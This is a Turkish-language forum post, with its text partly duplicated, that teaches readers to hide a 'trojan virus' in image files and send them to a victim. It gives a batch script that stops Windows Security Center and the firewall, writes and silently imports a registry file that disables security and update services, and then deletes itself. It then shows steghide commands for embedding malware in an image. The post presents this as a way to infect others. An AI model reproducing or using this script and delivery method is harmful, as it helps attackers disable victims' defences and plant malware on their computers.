Bugün sizlere resimlere trojan virüs koyma yollarından bir tanesini göstereceğim ve hemen ardından programsız resime 2 tane virüs ekleme yolunu göstereceğim, hazırsanız konumuza geçelim
İlk yol;
Resime gelip, resmi not defteri ile birlikte açacağız vereceğim kodu resim kodlarının en üstüne ekleyin.
Virüs programınız etkin olsun, daha sonra tekrar resmin üstüne gelin winrar şeklinde kamufle edip, karşı kişiye yollayın.
Steghide, kullanıcıların dosyaların içine gizli veriler yerleştirmesine olanak tanır
Linux kodu:
-ef (Embed File ) : Gizlenecek veri dosyasını belirtmek için kullanılır
-cf ( Cover File ) : İçine veri gizlenilmek istenilen dosyayı belirtmek için kullanılır.
-sf ( Stego File ) : Steganografi uygulanmış dosyayı belirtmek için kullanılır.
Bunlar Linux için belli birkaç bilinen parametreler bu işlem Linux üzerinden de yapılır fakat biz windows işletim sistemimiz üzerinden yapalım.
Uygulamamızı site üzerinden indirelim
Steghide İndir
Öncelikle bir resime ve bir zararlı yazılıma ihtiyacımız var bunları hallettik, varsayıyorum.
Windows Komut Satırını yönetici olarak çalıştıralım.
Aşağıdaki dosya bulma kodumuzu girelim
Sonra virüsün gömüleceği dosyanın şifresini belirleyerek giriş yapacağız.
Bu ve bunun ileri versiyonu faaliyetlerler birçok casusluk faaliyetlerinde kullanılıyor, talep olur ise uygun bir vakit video eşliğinde daha detaylı, video eşliğinde anlatım yapabilirim.
İyi forumlar
İlk yol;
Resime gelip, resmi not defteri ile birlikte açacağız vereceğim kodu resim kodlarının en üstüne ekleyin.
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.&l92;kill.reg" ECHO A R E S
>>"%Temp%.&l92;kill.reg" ECHO.
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;CurrentControlSet&l92;Servic es&l92;SharedAccess]
>>"%Temp%.&l92;kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;CurrentControlSet&l92;Servic es&l92;wuauserv]
>>"%Temp%.&l92;kill.reg" ECHO [HKEY_LOCAL_MACHINE&l92;SYSTEM&l92;ControlSet001&l92;Services&l92;w scsvc]
START /WAIT REGEDIT /S "%Temp%.&l92;kill.reg"
DEL "%Temp%.&l92;kill.reg"
DEL %0
Virüs programınız etkin olsun, daha sonra tekrar resmin üstüne gelin winrar şeklinde kamufle edip, karşı kişiye yollayın.
Gelelim ikinci yolumuza;
Steghide, kullanıcıların dosyaların içine gizli veriler yerleştirmesine olanak tanır
Linux kodu:
Kod:
apt-get install steghide
-ef (Embed File ) : Gizlenecek veri dosyasını belirtmek için kullanılır
-cf ( Cover File ) : İçine veri gizlenilmek istenilen dosyayı belirtmek için kullanılır.
-sf ( Stego File ) : Steganografi uygulanmış dosyayı belirtmek için kullanılır.
Bunlar Linux için belli birkaç bilinen parametreler bu işlem Linux üzerinden de yapılır fakat biz windows işletim sistemimiz üzerinden yapalım.
Uygulamamızı site üzerinden indirelim
Steghide İndir
Öncelikle bir resime ve bir zararlı yazılıma ihtiyacımız var bunları hallettik, varsayıyorum.
Windows Komut Satırını yönetici olarak çalıştıralım.
Aşağıdaki dosya bulma kodumuzu girelim
Kod:
C:\steghide>steghide.exe embed -cf (resmin olduğu dosya) -ef (virüsün olduğu dosya)
Sonra virüsün gömüleceği dosyanın şifresini belirleyerek giriş yapacağız.
Bu ve bunun ileri versiyonu faaliyetlerler birçok casusluk faaliyetlerinde kullanılıyor, talep olur ise uygun bir vakit video eşliğinde daha detaylı, video eşliğinde anlatım yapabilirim.
İyi forumlar